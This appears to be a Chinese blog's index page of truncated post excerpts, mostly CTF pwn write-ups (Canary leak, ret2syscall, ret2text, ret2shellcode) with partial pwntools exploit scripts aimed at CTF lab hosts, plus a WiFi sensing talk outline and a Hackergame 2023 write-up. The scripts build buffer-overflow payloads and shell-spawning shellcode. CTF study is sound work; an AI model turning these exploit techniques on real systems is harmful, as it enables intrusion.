第五空间2019-决赛PWN5
开了Canary 所以要泄露出canary的值
这里可以看到printf函数可以泄露出canary的值
用time(0)作为种子生成了随机数 写一个c函数 引入之前写过的random1.so 生成一个以time(0)为种子的随机数
学长的题
啥也没有
正常的syscall 只需要找到pop_rax pop_rdx pop_rsi pop_rdi 然后写参数进去就好了
1234567891011121314151617181920212223242526272829303132333435363738394041from pwn import *from LibcSearcher import *context( terminal=["wt.exe","wsl"], os = "linux", #arch = "amd64", arch = "i386", log_level="debug",)elf = ELF("./pwn")io = process("./pwn")#io = remote("node5.anna.nssctf.cn",28929)def debug(): gdb.attach(io) ...
ret2syscall_64
32位
eax->ebx->ecx->edx
64位
rdi->rsi->rdx->rcx->r8->r9
首先找到rax
123(pwn) ┌──(root㉿HBWU-L0WLUK)-[/mnt/…/work/pwn/other/ret2syscall]└─# ROPgadget --binary pwn --only "pop|ret" | grep 'rax'0x000000000046b9f8 : pop rax ; ret
系统调用号_雪的期许的博客-CSDN博客
NEWSTART
ret2text
啪的一下很快啊 exp就出来了
exp12345678910111213141516171819from pwn import *from LibcSearcher import *context( terminal=["wt.exe","wsl"], os = "linux", arch = "amd64", #arch = "i386", log_level="debug",)elf = ELF("./pwn")#io = process("./pwn")io = remote("node4.buuoj.cn",29607)def debug(): gdb.attach(io) pause()#debug()payload = cyclic(0x20+0x8)+p64(0X4011FB)io.sendlineafter("magic ...
WIFI感知演讲
区别市面上主流感知设备
视觉感知!
雷达感知:雷达传感器使用无线电波来感知周围环境。它们可以探测物体的位置、速度和方向,并广泛应用于自动驾驶、智能交通系统等领域。
气体感知:气体传感器用于检测和测量环境中的气体浓度。它们在环境监测、工业安全等领域发挥重要作用。
声纳感知:声纳传感器使用声音波进行感知,测量物体的距离和位置。它们广泛应用于声纳定位、水下探测等领域
优缺点(问问题)视觉感知:
优点:
丰富的信息获取:视觉感知可以提供丰富的环境信息,如物体识别、人脸识别、动作检测等。
高精度:视觉感知在图像处理和计算机视觉算法的支持下,可以实现高精度的场景分析和物体识别。
实时性:现代摄像头和图像处理技术可以实现实时的视觉感知和分析。
缺点:
需要专用设备:视觉感知通常需要摄像头或其他视觉传感器作为设备支持,增加了成本和部署难度。
受光照和遮挡影响:视觉感知对光照条件和物体遮挡比较敏感,可能会影响感知结果的准确性。
隐私问题:视觉感知涉及对图像和视频数据的处理,需要妥善处理用户隐私和数据安全的问题。
WiFi感知?WiFi工作原理(黑板作画)WiFi信号发射:WiFi感知依赖 ...
HNCTF 2022 ezr0p32
第一次read把数据写到全局buf处 所以我们只要写bin/sh就可以有地址了
exp123456789101112131415161718192021222324from pwn import *from LibcSearcher import *context( terminal=["wt.exe","wsl"], os = "linux", #arch = "amd64", arch = "i386", log_level="debug",)elf = ELF("./pwn")#io = process("./pwn")io = remote("node5.anna.nssctf.cn",28863)def debug(): gdb.attach(io) pause()#debug()shellcode = asm(shellcraft.sh()) ...
WUSTCTF-2020getshell2
call system
exp12345678910111213141516171819202122232425from pwn import *from LibcSearcher import *context( terminal=["wt.exe","wsl"], os = "linux", #arch = "amd64", arch = "i386", log_level="debug",)elf = ELF("./pwn")#io = process("./pwn")io = remote("node5.anna.nssctf.cn",28929)def debug(): gdb.attach(io,'''b *0x80485B9''') pause()debug()offet = 0x18+0x ...
HNCTF 2022 Week1-ret2shellcode
查看保护直接扔64位
IDA64
没有/bin/sh字样 根据题目可以知道是ret2shellcode
注意需要找到可读可写的bss字段 所以我们gdb设断点到main
然后一路ni到call read
然后vmmap
发现0x404000 0x405000 rwxp 段可读可写 从ida查到是buff全局变量 所以我们可以往里面写shellcode
exp123456789101112131415161718192021222324from pwn import *from LibcSearcher import *context( terminal=["wt.exe","wsl"], os = "linux", arch = "amd64", #arch = "i386", log_level="debug",)elf = ELF("./pwn")io = proc ...
HACKERGAME2023题解
部分题目wp(我太菜了)
Hackergame 启动
(我真的在宿舍大喊)
后面提交之后注意到
状态栏处有simliarity 改为100即可原神启动(bushi)
git!git!在本地仓库.git处git log
通过git_extract获取之前修改过的文件
然后
grep -r ‘flag’
发现flag
猫咪小测这题纯百度 浏览记录
不止这些 反正这题就是百度就对了
旅行照片 3.0
谷歌识图后知道是诺贝尔奖 输入金牌上的文字问newbing知道M.KOSHIBA是东京大学的 小柴 昌俊 所以学长的学校就是在东京大学 MMII是年份 2020年
一样谷歌识图 知道是上野公园的喷泉广场
第一问google关键词 上野公园 活动 定位时间到暑假期间 知道有个饮酒节
即将开始意味着
是在10号之前 穷举得是8-10号
第二问
找到东京大学官网 发现有个50几年的年轻佬 输入关键词可以知道
第三问
根据刚才的梅酒节可以找到志愿者登记表
第四问找到对面那个东京那个博物馆的官网 成人1000日语 学生500日元 但是都错了 随便试了0元 对了 离谱
赛博井字棋
F12看源码 ...